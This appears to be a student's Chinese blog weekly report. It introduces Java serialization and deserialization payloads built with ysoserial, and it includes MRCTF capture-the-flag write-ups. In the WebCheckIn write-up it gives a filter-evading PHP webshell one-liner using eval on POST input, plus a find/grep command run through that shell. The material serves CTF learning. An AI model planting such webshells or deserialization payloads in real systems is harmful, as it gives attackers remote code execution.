周报 4月24日

已于 2022-05-28 21:06:59 修改
阅读量822 收藏
点赞数
分类专栏: 每周计划和总结 文章标签: java 开发语言
于 2022-05-02 15:37:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51614272/article/details/124541741
版权

Sunlight的一周知识动态

周三周四期中考试,准备了一波,把计网书后面的四个章习题撸了一下,之前做过的实验复习了一下,最后理论考的一般般,实验满分了。周五周日学了一下JAVA反序列化,入了一下门,周六玩了两个比赛:DASCTF、MRCTF,都只弄出来签到题,太难了。。

JAVA反序列化

知识点

1
  • 序列化就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程
  • 反序列化即逆过程,由字节流还原成对象

注: 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。

Java中的API实现:

位置: Java.io.ObjectOutputStream  java.io.ObjectInputStream

序列化:  ObjectOutputStream类 --> writeObject()

注:该方法对参数指定的obj对象进行序列化,把字节序列写到一个目标输出流中
按Java的标准约定是给文件一个.ser扩展名

反序列化: ObjectInputStream类 --> readObject()

注:该方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回。

2

PHP里主要是魔术方法来触发漏洞,JAVA主要是控制数据的问题。

补充知识点
下方的特征可以作为序列化的标志参考:

  • 一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
  • 或者如果以aced开头,那么他就是这一段java序列化的16进制。

反序列化过程

  • 序列化和反序列化就是一种格式转换的过程,把对象转换成其他格式。
package 反序列化1;

import java.io.*;

class Person implements Serializable{//注意Person一定要继承Serializeable接口
    String name;
    int age;
    String sex;
    int stuld;
    public  Person(String name,int age,String sex,int stuld){
        this.name=name ;
        this.age=age;
        this.sex=sex;
        this.stuld=stuld;
    }
}

public class SerializebleTest {
    //Person对象序列化
    private static void serialPerson() throws IOException{
        Person person = new Person ("xiaodi",28,"男",101);

        ObjectOutputStream oos = new ObjectOutputStream(
                new FileOutputStream(new File("d:/person.txt"))
        );
        oos.writeObject(person);
        System.out.println("person 对象序列化成功");
        oos.close();
    }

    //Person对象反序列化
    private static Person deserialPerson() throws Exception{
        ObjectInputStream ois = new ObjectInputStream(
                new FileInputStream(new File("d:/person.txt"))
        );
        Person person = (Person)ois.readObject();
        System.out.println("person 对象序列化成功");
        return person;
    }
    public static void main (String[] args)throws Exception{
        serialPerson();
        Person person = deserialPerson();
        System.out.println(person);
    }
}

得到一个反序列化之后的结果:
在这里插入图片描述

payload构造过程

1、反弹shell

关于是否回显的问题(是否print输出到显示屏),我们需要进行反弹shell操作,避免不回显。

反弹命令的写法:windows Linux

一般输出的结果他会进行一波base64,所以都要反序列化之后base64加密一下:
小脚本:

import base64

c=open("payload.bin","rb").read()
cc=base64.urlsafe_b64encode(c)
open("payload.txt","wt",encoding="utf-8").write(cc.decode())
1、ysoserial工具的使用

webgoat实例

上传一个ysoserial工具构造出的payload,再用base64编码一下就可以实现任意代码代码执行

MRCTF wp

checkin

  • 信息检索其实也是有技巧有方法的
在源码,目录中搜索:
  • 有可能因为浏览器问题,一次性搜不出来所有东西,甚至不出现结果,要多试几次
搜索关键词:
  • 1.flag、ctf、hint、txt、zip
  • 2.比赛flag格式的前几位的base64编码,rot13编码。例如:
vishwactf{}  --> dmlzaHdhY3Rme
MRCTF{}      --> TVJDVEZ7
  • 3.和题目提示相关的内容
  • 4.jsfuck +[] 和 []] 等等
  • 5.其他的各种编码
  • 6.alert alert ( alert( 分别是alert和有空格和没空格
  • 7.自建正则表达式

WebCheckIn

直接上传一个含木马的php文件,成功后拿蚁剑连接。找flag

php文件的过滤方式未知

但就是不能以;为末尾,不能用?>来闭合
一种解决方法:

if(eval($_POST[1])){}

既没有以;来末尾,也没用?>来闭合
在这里插入图片描述
在这里插入图片描述
find命令搜索flag:

1=find /var -type f | xargs grep 'MRCTF{'
Sunlight_614
关注
专栏目录
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3468
ysoserial这款工具,堪称为“java反序列利用神器”。
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 2082
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
ysoserial 使用教程
最新发布
gitblog_00240的博客
09-02 438
ysoserial 使用教程 ysoserial项目地址:https://gitcode.com/gh_mirrors/ysos/ysoserial 项目介绍 ysoserial 是一个用于生成利用不安全 Java 对象反序列化的有效负载的概念验证工具。它包含了一系列在常见 Java 库中发现的“gadget chains”,可以在特定条件下利用执行不安全的反序列化操作的 Java 应用程序。 ...
基于ysoserial的深度利用研究(命令回显与内存马)
2401_84488651的博客
06-20 1026
很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。
Java AES Crypto 开源项目教程
gitblog_01117的博客
08-22 861
Java AES Crypto 开源项目教程 java-aes-cryptoA simple Android class for encrypting & decrypting strings, aiming to avoid the classic mistakes that most such classes suffer from.项目地址:https://gitcode.com/gh_m...
汽车第18周周报:4重卡销量20万辆,延续高景气度.pdf
07-02
- 2021年4重卡销量达到20万辆,同比增长4%,创下重卡市场4份销量新高。 - 1-4份重卡累计销量为73万辆,同比增长57%,显示了行业的持续高景气度。 - 均零售和批发的统计数据说明了市场销售的活跃程度,...
2018年1224至1228周报(第36期):消费板块景气跟踪之家电篇.pdf
07-10
在描述部分,《2018年1224至1228周报(第36期)》提到了具体的分析时间跨度,并指出本报告为第36期周报,说明该报告是一个周期性的行业跟踪系列。内容涉及了家用电器行业的销量变化、液晶面板价格动态、地产...
2019年520至524周报(第56期):消费板块景气跟踪之商贸零售篇.pdf
07-16
这份文档是2019年的一份行业分析报告,主题为商贸零售板块在特定时间段(2019年520至524)的市场表现与趋势分析。这份报告重点分析了以下方面的内容: 一、社会消费品零售总额增速分析 报告首先指出,社会...
电力设备第20周周报:隆基硅片再降价,4动力电池装机回暖.pdf
07-13
本报告主要关注电力设备领域,尤其在2020年第20周内发生的行业动态,包括隆基硅片价格的下调、4动力电池装机量的回暖以及钴锂价格的缓慢下跌等方面。 首先,隆基硅片价格的再次下调成为行业焦点。隆基作为硅片...
电力设备第22周周报:4风光装机同比大增,欧盟计划电动车免增值税.pdf
07-13
- 报告发布期为2020年524,提供了一段时间内的升幅和绝对收益数据。 文件内容还提到了具体的投资评级,如买入-A、买入-B、增持-A等,这些通常是针对特定股票的评级,表明分析师对这些公司未来表现的预期。...
dotnet-ysoserialnet用于各种NET格式化器的反序列化有效负载生成器
08-15
ysoserial.net 用于各种.NET格式化器的反序列化有效负载生成器
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1310
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
小迪安全47WEB 攻防-通用漏洞&Java 反序列化&EXP 生成&数据提取&组件安全
weixin_73760178的博客
03-25 1433
操作成功,且得知了是admin操作的,这就说明在序列化下存在admin的权限,且只有此功能存在了对序列化的读取才会知道有admin用户,故存在反序列化操作。Person person = new Person("xiaodi", 28, "男", 101);System.out.println("person 对象反序列化成功!利用:当我们对序列化后的数据进行数据更改,构造出恶意代码,再放回去,便形成了反序列化攻击。发现,data里有反序列化数据,解密一下(base64解密java_bs.py+
MRCTF部分题的总结与复现
qwzf
04-10 9617
0x00 前言 题目整体来说不太难,毕竟是个新生赛。但考察的知识点等方面,确实需要总结一下。于是我总结了部分MISC、Crypto和Web。
java序列化理解_对ysoserial工具及java反序列化的一个阶段性理解
weixin_39615808的博客
02-24 326
经过一段时间的琢磨与反思,以及重读了大量之前看不懂的反序列化文章,目前为止算是对java反序列化这块有了一个阶段性的小理解。目前为止,发送的所有java反序列化的漏洞中。主要需要两个触发条件:1、反序列化的攻击入口2、反序列化的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以反序列化。其实这块是有一定的误导性的。在我最初研究反序列化的时候,我觉得攻击链...
反序列化工具ysoserial使用介绍
qq_34778376的博客
02-23 6660
反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload; 下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8877
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
推荐开源项目:ysoserial-modified
gitblog_00031的博客
06-04 309
推荐开源项目:ysoserial-modified ysoserial-modifiedThat repository contains my updates to the well know java deserialization exploitation tool ysoserial.项目地址:https://gitcode.com/gh_mirrors/ys/ysoserial-modi...
因子表现周报:盈利上升,规模因子反转
3. 技术指标类因子:部分因子如3个股价动量(反转)和RSI(24相对强弱指数)继续展现出较高的收益,RSI因子连续9周表现强劲,可能预示着市场情绪和技术趋势的变化。 4. 波动性类因子:波动性相关的因子如2个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值